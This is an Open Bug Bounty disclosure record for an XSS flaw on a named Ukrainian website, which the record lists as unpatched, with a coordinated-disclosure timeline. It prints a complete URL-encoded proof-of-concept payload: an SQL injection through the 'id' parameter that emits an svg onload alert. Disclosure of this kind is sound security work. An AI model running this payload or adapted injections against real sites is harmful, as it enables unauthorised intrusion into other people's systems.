будки-вольеры.com.ua XSS vulnerability

2016-03-03T12:39:00
ID OBB:139603
Type openbugbounty
Reporter amlnspqr
Modified 2016-03-24T13:11:00

Description

Vulnerable URL:
http://будки-вольеры.com.ua/preparats/?action=assortment&id;=%27%20%6F%72%20%75%70%64%61%74%65%78%6D%6C%28%30%2C%72%65%70%65%61%74%28%43%48%41%52%28%30%78%33%43%2C%30%78%37%33%2C%30%78%37%36%2C%30%78%36%37%2C%30%78%32%30%2C%30%78%36%46%2C%30%78%36%45%2C%30%78%36%43%2C%30%78%36%46%2C%30%78%36%31%2C%30%78%36%34%2C%30%78%33%44%2C%30%78%36%31%2C%30%78%36%43%2C%30%78%36%35%2C%30%78%37%32%2C%30%78%37%34%2C%30%78%32%38%2C%30%78%32%37%2C%30%78%35%38%2C%30%78%35%33%2C%30%78%35%33%2C%30%78%35%30%2C%30%78%34%46%2C%30%78%35%33%2C%30%78%34%35%2C%30%78%34%34%2C%30%78%32%37%2C%30%78%32%39%2C%30%78%33%45%29%2C%32%29%2C%32%29%20%6F%72%20%27
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 March, 2016 12:39 GMT
Generic security notifications sent to website owner| 3 March, 2016 12:42 GMT
Vulnerability details disclosed by researcher| 24 March, 2016 13:11 GMT